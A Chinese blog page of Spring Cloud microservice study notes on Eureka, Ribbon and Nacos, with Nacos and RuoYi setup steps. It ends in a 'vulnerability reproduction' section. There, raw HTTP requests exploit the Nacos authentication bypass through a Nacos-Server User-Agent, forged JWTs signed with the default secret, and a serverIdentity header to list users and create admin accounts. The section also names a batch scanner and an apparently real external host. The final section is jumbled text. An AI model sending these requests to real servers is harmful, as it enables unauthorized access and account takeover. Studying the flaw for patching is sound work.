当前位置: 首页 > news >正文

分布式微服务技术栈-SpringCloud<Eureka,Ribbon,nacos>

在这里插入图片描述

微服务技术栈

  • 一、微服务 介绍了解
    • 1 架构结构案例
      • 与 springboot 兼容关系
      • 拆分案例
        • 拆分
        • 服务拆分-服务远程调用
    • 2 eureka注册中心
      • Eureka-提供者与消费者
      • Eureka-eureka原理分析
      • Eureka-搭建eureka服务
      • Eureka-服务注册
      • Eureka-服务发现
    • 3 Ribbon组件 负载均衡
      • Ribbon-负载均衡原理
      • Ribbon-负载均衡策略
      • Ribbon-饥饿加载
    • 4 nacos 阿里注册中心
      • Nacos-快速入门
      • Nacos-服务多级存储模型
      • Nacos-NacosRule负载均衡
      • Nacos-服务实例的权重设置
      • Nacos-环境隔离
      • Nacos和Eureka的对比
      • Nacos实现配置管理
      • Nacos配置管理-微服务配置拉取
      • Nacos配置管理-配置热更新
      • Nacos配置管理-多环境配置共享
      • Nacos配置管理-nacos集群搭建
  • 安装Nacos
  • Java快速开发框架_若依——Ruoyi-SpringCloud版本-3.下载源码并导入数据库 安装nacos
      • 准备工作
      • 运行系统
  • Nacos 漏洞复现
    • 介绍
    • 未授权添加用户

一、微服务 介绍了解

分布式架构的一种
把服务进行 拆分
springcloud 解决了 服务拆分过程中的 治理问题
与单体应用 进行区分
(单体架构 把业务所有功能集中开发,打成一个包部署)

在这里插入图片描述

每个模块独立开发和部署(服务集群)

在这里插入图片描述

在这里插入图片描述

服务之间互相调用
在这里插入图片描述
出现分布式技术
Webservice
ESB
Hession
Dubbo

异步通信 消息队列(秒杀)
敏捷开发思想
在这里插入图片描述
高内聚低耦合

微服务 + 持续集成
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

1 架构结构案例

微服务方案 技术框架落地
eg springcloud + 阿里dubbo

2012 dubbo 开源 (“半吊子”微服务)

2015-2017 springcloud(整合)
封装了Feign客户端 发http 请求 Restful接口
Spring Cloud Bus 自动通知 热更新

实现了同样的 接口规范
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
springcloud 模块

  • 统一配置管理
  • 服务注册发现
  • 请求路由
  • 服务远程调用
  • 负载均衡
  • 断路
    在这里插入图片描述
    在这里插入图片描述
    基于 springboot 自动装配

与 springboot 兼容关系

在这里插入图片描述
Hoxton SR10 + boot2.3.x

拆分案例

拆分

功能模块进行拆分
单一职责
即 不同微服务 不重复开发相同业务
数据独立
不要访问其他微服务数据库
业务接口
每个模块将自己的业务暴露为接口,供其他服务调用
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
且没法关联查询
在这里插入图片描述
将工程文件夹放到 IDE 的 工作空间
在这里插入图片描述在这里插入图片描述
可以看到项目所有的微服务
在这里插入图片描述

项目结构
父工程(主要定义了依赖版本)

在这里插入图片描述在这里插入图片描述
数据分离
在这里插入图片描述
业务逻辑
在这里插入图片描述
在这里插入图片描述
返回订单对象
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
符合 微服务 拆分 的单一职责
在这里插入图片描述

服务拆分-服务远程调用

在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述
spring的 HTTP 请求工具
用Bean的方式 把RestTemplate 注册 为spring容器 的 对象
就可以在任何地方 以 注入的方式 来用
在这里插入图片描述
Bean的注入 只能放在 配置类里面
带有 main的 启动类 本身也是配置类

在这创建 RestTemplate对象
在这里插入图片描述
跟入 orderservice 在这里插入图片描述
先把 resttemplate注入进spring 容器里来
在这里插入图片描述
http请求 返回 json 但在这里需要一个user对象
resttemplate 会 给让你输入一个 返回对象
在这里插入图片描述

2 eureka注册中心

Eureka-提供者与消费者

在这里插入图片描述
在这里插入图片描述
概念 是 业务中谁对谁而言
既可以是 提供 也可以是 消费者
在这里插入图片描述

Eureka-eureka原理分析

在这里插入图片描述
ip 端口 是 硬编码在 代码中的
不方便 环境部署
集群 不好布置
在这里插入图片描述

注册中心 (记录管理微服务)
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Eureka-搭建eureka服务

在这里插入图片描述
在这里插入图片描述
starter -----spring boot里面的 自动装配
注解是 eureka server 自动装配的 开关

创建 maven模块
在这里插入图片描述
在这里插入图片描述
父工程pom 已经把 版本依赖做好了
在这里插入图片描述
所有组件版本信息 点进去看
在这里插入图片描述
加个 springboot注解
psvm

在这里插入图片描述
加上 eureka 自动装配的 开关注解(启动类 上 做注解)

新建 配置文件

eureka 集群 所以 自己也将自己的 微服务 注册
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
注册到eureka 的 实例

windows 显示的 是 计算机名 本来是 ip
在这里插入图片描述

Eureka-服务注册

在这里插入图片描述
在这里插入图片描述
编辑eureka地址信息
yml文件 不许 出现两个 根名称
在这里插入图片描述
在这里插入图片描述
启动两个实例
在这里插入图片描述

在这里插入图片描述
-D 参数
yml 文件 内的 server.port
在这里插入图片描述
实例列表
在这里插入图片描述
在这里插入图片描述

Eureka-服务发现

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
查看 order services 是 负载均衡 走的 哪个
在这里插入图片描述
在这里插入图片描述

3 Ribbon组件 负载均衡

Ribbon-负载均衡原理

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
LoadBalancer 标记 拦截 实现 http 请求 接口
在这里插入图片描述
在这里插入图片描述
接口定义的 方法名字 intercept
在这里插入图片描述
同样实现了intercept 方法
下断点
在这里插入图片描述
取得主机名
去 做 服务拉取

在这里插入图片描述
Ribbon load balamcer对象
在这里插入图片描述
步入 这个 execute 方法
在这里插入图片描述在这里插入图片描述
把这个 service id 交给 getloadBanlancer处理
得到 loadbalancer 对象

动态服务列表 负载均衡器
在这里插入图片描述
在这个对象里面
在这里插入图片描述
就拉取到了 服务列表

整个步骤 根据 服务名称 拉取 服务列表
在这里插入图片描述
getserver 开始负载均衡
在这里插入图片描述
在这里插入图片描述
进入 getserver 方法
选择 server 步入
在这里插入图片描述
找一个 super 父亲的 选择

在这里插入图片描述
在这里插入图片描述
走到了 rule 的 选择

要有一个 规则 从 动态 server 里 选
在这里插入图片描述
这个 IRule 是一个 接口I
规则接口 那就会有实现类

IDEA Ctrl H 查看实现类
在这里插入图片描述
比如
轮询负载均衡
随机

默认规则 ZoneAvoidance
在这里插入图片描述
返回来了 选择的 8081
在这里插入图片描述

Ribbon-负载均衡策略

IRule 接口 继承关系 图

在这里插入图片描述
ZoneAvoidance 这个 它爷爷 也是 轮询

在这里插入图片描述
在 服务 注册 时 可以 设置 zone的 值
(杭州,上海)

配置类内 修改 规则 用 Irule 的 bean 作为 一个 对象 注入到 spring 容器

可以 实现 Irule 各种类型
在这里插入图片描述
在这里插入图片描述
全局的

在这里插入图片描述
针对 某个 微服务的 配置
在这里插入图片描述

Ribbon-饥饿加载

在这里插入图片描述
在这里插入图片描述在这里插入图片描述
创建 load balance Client 还要做 服务拉取
时间较长

在这里插入图片描述
拉取 时 创建了 动态 serverlist load balancer 等 耗费时间 - 懒加载
第二次 server list 会 缓存到内存中
在这里插入图片描述
在这里插入图片描述
与 spring boot 一样

在这里插入图片描述
随着 tomcat 启动 就完成了

在这里插入图片描述

springmvc 容器 的 初始化
在这里插入图片描述
在这里插入图片描述

4 nacos 阿里注册中心

在这里插入图片描述在这里插入图片描述
在这里插入图片描述
服务注册 与发现
分布式 配置
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

8848 默认端口

在这里插入图片描述
在这里插入图片描述

-m 模式 单启动
在这里插入图片描述

在这里插入图片描述

Nacos-快速入门

在这里插入图片描述
通用 在这里 定义了 接口规范

定义了服务发现 与 服务注册
在这里插入图片描述
Eureka 和 nacos 都要遵循 这些接口

所以 服务者 消费者 代码 不用变
需要 更改 依赖 和 地址

在这里插入图片描述在这里插入图片描述在这里插入图片描述

添加 父管理依赖
添加 服务注册 启动器依赖

在这里插入图片描述在这里插入图片描述在这里插入图片描述

添加yml 地址
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

Nacos-服务多级存储模型

在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Nacos-NacosRule负载均衡

在这里插入图片描述在这里插入图片描述
nacos 地区 随机 选择 服务
在这里插入图片描述
如果 本地 没有 服务 访问 外地 同服务 同时 警告
在这里插入图片描述

Nacos-服务实例的权重设置

在这里插入图片描述
在这里插入图片描述在这里插入图片描述
调整成0 时 权重 , 不会被 访问

平滑升级业务
在这里插入图片描述

Nacos-环境隔离

注册中心 - 数据中心 对 服务 进行 隔离
命名空间 - group 属性
在这里插入图片描述

服务(集群)–下一级–》 实例

对实例的划分 是 对业务 进行的 划分 (地域)

命名空间 是 对于 开发生产 测试 环境 的划分
(比如 把 业务相似度 比较高的 服务 放在 一个 分组)
在这里插入图片描述

订单—支付 放一块
在这里插入图片描述
默认 public
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
添加 命名 空间的 ID
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

Nacos和Eureka的对比

会在 动态服务 loadbalancer 里拉取 缓存 server 列表 周期30s
在这里插入图片描述

区别 在于 提供者的 健康检测
在这里插入图片描述

划分 提供者 为 临时 实例
和非临时实例
在这里插入图片描述
临时 实例 会 直接剔除
非临时实例 会 等待 康复
在这里插入图片描述
如果 提供者 挂掉了 nacos 主动 推送 变更 消息

在这里插入图片描述在这里插入图片描述在这里插入图片描述
临时实例  关掉服务 直接 剔除

在这里插入图片描述
在这里插入图片描述
非临时实例 不会被 剔除掉 等待 复活

在这里插入图片描述
nacos 强调 AP 数据的 可用性
CP 强调 可靠性 和 一致性
在这里插入图片描述
Nacos 配置管理 功能

Feign 声明式远程调用 比较 Resttemplate

Nacos实现配置管理

在这里插入图片描述
配置文件 - 关联服务重启 - (热更新 不用重启 就能 配置 生效)

配置管理服务 记录核心配置
在这里插入图片描述

读取配置 结合 本地配置

DataID 服务名称+ profile运行环境名 dev/test/prod.yaml

在这里插入图片描述
在这里插入图片描述

模版 类型
在这里插入图片描述在这里插入图片描述

在这里插入图片描述

Nacos配置管理-微服务配置拉取

 ![在这里插入图片描述](https://img-blog.csdnimg.cn/e2f375f857d245388e8770ec78de4f03.png)

在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
去掉重复配置

用 Value 注解 读取配置

在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Nacos配置管理-配置热更新

在这里插入图片描述
属性刷新
在这里插入图片描述在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

配置 自动加载 注解
在这里插入图片描述
定义一个 成员变量
在这里插入图片描述
添加 data注解 getset 方法

用 component 把这个类变成 spring 容器的 一个 bean
在这里插入图片描述
在这里插入图片描述
注入进来 用getdateformat 获取
在这里插入图片描述

Nacos配置管理-多环境配置共享

开发生产测试 环境 配置值 一致
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
另起一个 spring 测试 微服务 环境
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
配置文件 的 优先级
在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述

以 userservice 为准

共享 与 有环境的 以 环境为准
在这里插入图片描述在这里插入图片描述

Nacos配置管理-nacos集群搭建

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

nginx 有 反向代理 和 负载均衡 的 功能

在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
粘贴到 http 的 内部
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

安装Nacos

输入命令:

wget https://github.com/alibaba/nacos/releases/download/1.2.0/nacos-server-1.2.0.tar.gz

在这里插入图片描述

https://github.com/alibaba/nacos/releases

在这里插入图片描述

 tar -zxvf nacos-server-1.4.1.tar.gz

在这里插入图片描述
修改配置文件,
支持mysql,修改nacos/conf/application.properties文件,
增加支持mysql数据源配置(目前只支持mysql),
添加mysql数据源的url、用户名和密码,

 vi conf/application.properties

在这里插入图片描述
在这里插入图片描述

 spring.datasource.platform=mysql### Count of DB:
db.num=1### Connect URL of DB:
db.url.0=jdbc:mysql://127.0.0.1:3306/nacos?characterEncoding=utf8&connectTimeout=1000&socketTimeout=3000&autoReconnect=true&useUnicode=true&useSSL=false&serverTimezone=UTC
db.user.0=nacos
db.password.0=nacos

在这里插入图片描述
在这里插入图片描述将java安装包传到/home/java中

tar zxvf 压缩包名称

解压就安装完成了,之后我们要进行环境配置了

vi /etc/profile
 export JAVA_HOME=/home/java/jdk1.8.0_231export CLASSPATH=.:$JAVA_HOME/jre/lib/rt.jar:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jarexport PATH=$PATH:$JAVA_HOME/bin

在这里插入图片描述在这里插入图片描述在这里插入图片描述

生效命令:

source /etc/profile

访问地址为:

http://127.0.0.1:8848/nacos 

启动服务
切换到bin目录,执行命令:sh startup.sh -m standalone
关闭服务
切换到bin目录,执行命令:sh shutdown.sh

注意:
此版本必须安装jdk1.8+版本,不然启动时会报错

默认没有开启用户名和密码登录

需要修改application.properties文件中的nacos.core.auth.enabled=true
才能开启用户名密码登录,

用户名/密码:nacos/nacos
Nacos 修改mysql中默认账号密码
数据库会有一个默认用户。
在这里插入图片描述

这时候默认的用户名是nacos nacos,这要是放到公网上肯定是不安全的,接下来告诉大家怎么修改。

我们新建一个springboot项目,加入一个依赖 spring-boot-starter-security ,只需要这一个就好了。

<dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-security</artifactId><version>2.1.4.RELEASE</version>
</dependency>

然后写个类执行以下 new BCryptPasswordEncoder().encode(“你的密码”)就会生成新的加密过的密码。

import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;public class SetPassword {public static void main(String[] args) {System.out.println(new BCryptPasswordEncoder().encode("新密码"));}
}

接下来就是复制密码去数据库替换默认的密码。默认用户是nacos 也可以修改,那个是明文的可以直接改,但是如果要修改用户名的话,要修改roles表里用户。

 切换目录:cd /usr/local/nacos/bin
单机模式启动:sh startup.sh -m standalone

参考资料:
https://www.jianshu.com/p/55091f2ad6e1
https://blog.csdn.net/leaf_dai/article/details/103380851

Java快速开发框架_若依——Ruoyi-SpringCloud版本-3.下载源码并导入数据库 安装nacos

在这里插入图片描述

准备工作

 
JDK >= 1.8 (推荐1.8版本)
Mysql >= 5.7.0 (推荐5.7版本)
Redis >= 3.0
Maven >= 3.0
Node >= 10
nacos >= 1.1.0
sentinel >= 1.6.0

运行系统


#后端运行
1、前往Gitee下载页面(https://gitee.com/y_project/RuoYi-Cloud (opens new window))
下载解压到工作目录

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2、导入到Eclipse,菜单 File -> Import

然后选择 Maven -> Existing Maven Projects,点击 Next> 按钮,
选择工作目录,然后点击 Finish 按钮,即可成功导入。

Eclipse会自动加载Maven依赖包,初次加载会比较慢(根据自身网络情况而定)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

 3、创建数据库ry-cloud并导入数据脚本ry_2021xxxx.sql(必须),quartz.sql(可选)

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述

 
4、创建数据库ry-config并导入数据脚本ry_config_2021xxxx.sql(必须)

在这里插入图片描述
在这里插入图片描述

https://nacos.io/zh-cn/docs/quick-start.html

在这里插入图片描述
在这里插入图片描述

https://github.com/alibaba/nacos/releases

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

 
5、配置nacos持久化,修改conf/application.properties文件,增加支持mysql数据源配置
 # db mysql
spring.datasource.platform=mysql
db.num=1
db.url.0=jdbc:mysql://localhost:3306/ry-config?characterEncoding=utf8&connectTimeout=1000&socketTimeout=3000&autoReconnect=true
db.user=root
db.password=password

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

启动命令(standalone代表着单机模式运行,非集群模式):cmd startup.cmd -m standalone

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

尽量 不要带中文  打jar包 报错

在这里插入图片描述

高并发  -----好多  连接
高可用 ----- 一个宕机 不影响其他
每个应用微服务 ----  开启多个(对应不同端口)

在这里插入图片描述

Nacos 漏洞复现

介绍

Nacos(全称为"Naming and Configuration Service")是一个开源的动态服务发现、配置和服务管理平台,由阿里巴巴集团开源。它可以帮助开发者更好地构建云原生应用和微服务架构。Nacos的主要功能和特点包括:1. 服务发现与注册:Nacos提供了高可用的服务注册和发现功能,允许开发者按需注册、发现和注销服务实例。它支持多种服务发现协议,如DNSHTTP和gRPC,使得服务之间的通信更加简单和可靠。2. 动态配置管理:Nacos允许开发者将配置信息集中管理,并支持动态刷新。通过Nacos,开发者可以轻松修改、发布和回滚配置,而无需重启应用程序或重新部署。3. 服务路由与负载均衡:Nacos提供了灵活的服务路由和负载均衡功能,能够根据不同的场景和策略自动进行请求转发和负载均衡。4. 集群和扩展性:Nacos支持横向扩展,可以构建高可用的集群部署。开发者可以根据应用程序的需求,灵活扩展Nacos实例数量,以提供更高的可用性和性能。5. 健康检查与故障转移:Nacos能够对注册的服务进行健康检查,并自动剔除不健康的实例。在实例出现故障或不可用时,Nacos还能够进行故障转移,保证服务的连续可用性。6. 社区支持和生态系统:Nacos拥有活跃的开发者社区和广泛的应用场景。除了核心功能之外,Nacos还提供了丰富的插件和扩展,以满足不同应用场景的需求。Nacos是一个开源项目,源代码托管在GitHub上,并采用Apache License 2.0开源许可证。虽然Nacos由阿里巴巴集团发起,但它是一个面向全球开发者社区的开源项目,并得到了全球开发者的参与和贡献。

未授权添加用户

https://mp.weixin.qq.com/s/iCMiFGQnsqqfvqhbGxZ8pQ


Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。
但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。
并且利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息。影响版本: Nacos <= 2.0.0-ALPHA.1查看用户
访问路径,可以查看用户列表(包含密码)alibaba-nacos-v1-auth-bypass/nacos/v1/auth/users?pageNo=1&pageSize=100
User-Agent: Nacos-Server添加新用户
1、访问url2、请求改为post,把修改User-Agent头改为“Nacos-Server3、构造数据包添加一个admin用户,然后发送POST请求,返回为200,表示创建用户成功4、用新账户密码登录则登录成功漏洞修复
升级Nacos版本到最新版发送如下数据包成功创建用户POST /nacos/v1/auth/users HTTP/1.1
Host: 172.16.244.174:8848
User-Agent: Nacos-Server
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Length: 34username=test111&password=test1111https://www.secpulse.com/archives/199642.htmlhttps://jwt.io/#debugger-io
https://www.beijing-time.org/shijianchuo/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbWluZzExMTExMSIsImV4cCI6IjE2OTE5NTE5ODEifQ.sYrKZFyrjGpw5IHiy4aA1SVlqPxpVEeHxXhTndTyWgUPOST /nacos/v1/auth/users/login HTTP/1.1
Host: 192.168.30.100:8848
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://192.168.30.100:8848
Connection: close
Referer: http://192.168.30.100:8848/nacos/index.html
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY4MjMwODgwMH0.VJRpZj-TyDFbPKioQTrrWbQ-HlX_ZhkcuT_RVRniAA4username=najcos&password=nacjos方式二:默认未授权
发送如下数据包,成功创建用户POST /nacos/v1/auth/users HTTP/1.1
Host: 192.168.31.112:8848
Content-Type: application/x-www-form-urlencoded
Content-Length: 31username=test02&password=test02 SecretKey012345678901234567890123456789012345678901234567890123456789发送如下数据包成功创建用户
POST /nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3OTA4NTg3NX0.WT8N_acMlow8KTHusMacfvr84W4osgSdtyHu9p49tvc HTTP/1.1
Host: 192.168.31.112:8848
Content-Type: application/x-www-form-urlencoded
Content-Length: 31username=test03&password=test03方式四:默认头部
发送如下数据包,成功创建用户
POST /nacos/v1/auth/users HTTP/1.1
Host: 192.168.31.112:8848
Content-Type: application/x-www-form-urlencoded
serverIdentity: security
Content-Length: 31username=test05&password=test05GET /nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ&pageNo=1&pageSize=9 HTTP/1.1
Host: 172.25.0.249:8848
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://192.168.30.100:8848
Connection: close
Referer: http://nacos.ts.taslyy.cn:3080/nacos/index.html
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6NDY3ODk3MDQyM30.lnslDXAElX0J_STPpWmBOmiQaVcU3eK3F7McFehD_6Iusername=aminghack&password=yyds@amingpython3 Nacos_default.token.py -u [http://127.0.0.1:1111](http://127.0.0.1:1111/) 单个url测试python3 Nacos_default.token.py -a [http://127.0.0.1:1111](http://127.0.0.1:1111/) 添加用户m2orz/zzz321..python3 Nacos_default.token.py -f url.txt 批量检测payload1:[http://xxx.com/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ&pageNo=1&pageSize=9](http://xxx.com/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ&pageNo=1&pageSize=9)payload2:[http://xxx.com/nacos/v1/auth/users?accessToken=&pageNo=1&pageSize=9](http://xxx.com/nacos/v1/auth/users?accessToken=&pageNo=1&pageSize=9)扫描结束后会在当前目录生成存在漏洞url的vuln.txthttp://nacos.ts.taslyy.cn:3080/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ&pageNo=1&pageSize=9https://www.secpulse.com/archives/199642.htmlnacos nacos默认未授权
POST /nacos/v1/auth/users HTTP/1.1
Host: 192.168.31.112:8848
Content-Type: application/x-www-form-urlencoded
Content-Length: 31username=test02&password=amingmm123123默认JWT-secret
nacos/conf/application.properties中设置nacos.core.auth.enabled=true开启权限认证POST /nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3OTA4NTg3NX0.WT8N_acMlow8KTHusMacfvr84W4osgSdtyHu9p49tvc HTTP/1.1
Host: 192.168.31.112:8848
Content-Type: application/x-www-form-urlencoded
Content-Length: 31username=test03&password=amingmm123123默认头部POST /nacos/v1/auth/users HTTP/1.1
Host: 192.168.31.112:8848
Content-Type: application/x-www-form-urlencoded
serverIdentity: security
Content-Length: 31username=test05&passwordamingmm123123低版本(nacos<1.4.1)默认白名单UA
1.在nacos/conf/application.properties中设置
nacos.core.auth.enable.userAgentAuthWhite=true开启白名单UAhttps://www.box3.cn/tools/jwt.html
https://jwt.io/#debugger-ioPOST /nacos/v1/auth/users/login HTTP/1.1
Host: nacos.ts.taslyy.cn:3080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://192.168.30.100:8848
Connection: close
Referer: http://nacos.ts.taslyy.cn:3080/nacos/index.html
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6NDY3ODk3MDQyM30.lnslDXAElX0J_STPpWmBOmiQaVcU3eK3F7McFehD_6Iusername=aminghack&password=yyds@aming

相关文章:

分布式微服务技术栈-SpringCloud<Eureka,Ribbon,nacos>

微服务技术栈 一、微服务 介绍了解1 架构结构案例与 springboot 兼容关系拆分案例拆分服务拆分-服务远程调用 2 eureka注册中心Eureka-提供者与消费者Eureka-eureka原理分析Eureka-搭建eureka服务Eureka-服务注册Eureka-服务发现 3 Ribbon组件 负载均衡Ribbon-负载均衡原理Ribb…...

Unity解决:导出AndroidStudio工程 出现如下报错的解决方法

unity2019.4+ androidStudio2023.x+ 问题1: cvc-complex-type.2.4.a: 发现了以元素 base-extension 开头的无效内容。应以 {layoutlib} 之一开头。 解决:第一个Build.gradle更改如下 // GENERATED BY UNITY. REMOVE THIS COMMENT TO PREVENT OVERWRITING WHEN EXPORTING …...

Mac电脑怎么在Dock窗口预览,Dock窗口预览工具DockView功能介绍

DockView是一款Mac电脑上的软件&#xff0c;它可以增强Dock的功能&#xff0c;让用户更方便地管理和切换应用程序。 DockView的主要功能是在 DockQ&#xff0c;栏上显示每个窗口的缩略图&#xff0c;并提供了一些相关的操作选项。当用户将鼠标悬停在Dock栏上的应用程序图标上时…...

Hadoop3教程(三十):(生产调优篇)纠删码

文章目录 &#xff08;155&#xff09;纠删码原理纠删码原理纠删码相关命令纠删码策略解释 &#xff08;156&#xff09;纠删码案例实操参考文献 &#xff08;155&#xff09;纠删码原理 纠删码原理 默认情况下&#xff0c;一个文件在HDFS里会保留3个副本&#xff0c;以此提高…...

用nodejs爬虫台湾痞客邦相册

情景:是这样的,我想保存一些喜欢的小伙伴的照片,一张张保存太慢了, 所以我写了个js,放在国外服务器爬,国内的自己解决~ 使用方法 1.点相册随便一张, 复制url, 这张开始接下来的图片都会保存 /*** 2023年10月23日 22:58:44* 支持解析痞客邦相册* 只需要复制相册第一张图片的ur…...

物联网_01_物理设备的网络接入

设备的网络接入及物理层使用到的传输协议 现在物理设备有两种接入方式,一种是直接接入另一种是网关接入 直接接入 给物理设备添加NB-IOT通信模组等设备使之具有直接接入网络的能力 网关接入 物理设备在本地组网后通过统一的网关接入到网络(ZigBee无线组网网关).网关是处在本地…...

AD9371 官方例程之 tx_jesd 与 xcvr接口映射

AD9371 系列快速入口 AD9371ZCU102 移植到 ZCU106 &#xff1a; AD9371 官方例程构建及单音信号收发 AD9371 官方例程 时钟间的关系与生成 &#xff1a; AD9371 官方例程HDL详解之JESD204B TX侧时钟生成&#xff08;一&#xff09; AD9371 官方例程 时钟间的关系与生成 &…...

UserWarning: CUDA initialization: CUDA unknown error

CUDA在suspend之后不可用问题 问题描述 一觉醒来&#xff0c;电脑cuda不可用 /home/你的电脑/pytorch/lib/python3.8/site-packages/torch/cuda/__init__.py:107: UserWarning: CUDA initialization: CUDA unknown error - this may be due to an incorrectly set up enviro…...

C算法:使用选择排序实现从(大到小/从小到大)排序数组,且元素交换不可使用第三变量。

需求&#xff1a; 使用选择排序实现从(大到小/从小到大)排序&#xff0c;且元素交换不可使用第三变量 (异或交换法) 代码实现&#xff1a; #include <stdio.h> void maopao(int* array,int len,int(*swap)(int a,int b)) {int i,j;for(i0;i<len-1;i){for(ji1;j<…...

用mysql客户端操作时,一直提示 Lost connection to MySQL server during query

问题&#xff1a;ERROR 2013 (HY000): Lost connection to MySQL server during query :查询期间失去与 MySQL 服务器的连接 原因&#xff1a;如果客户端如果太长时间没动静&#xff0c;连接器就会自动将连接断开&#xff0c; 这个时间是由参数wait_timeout控制的&#xff0c;…...

KubeSphere一键安装部署K8S集群(单master节点)-亲测过

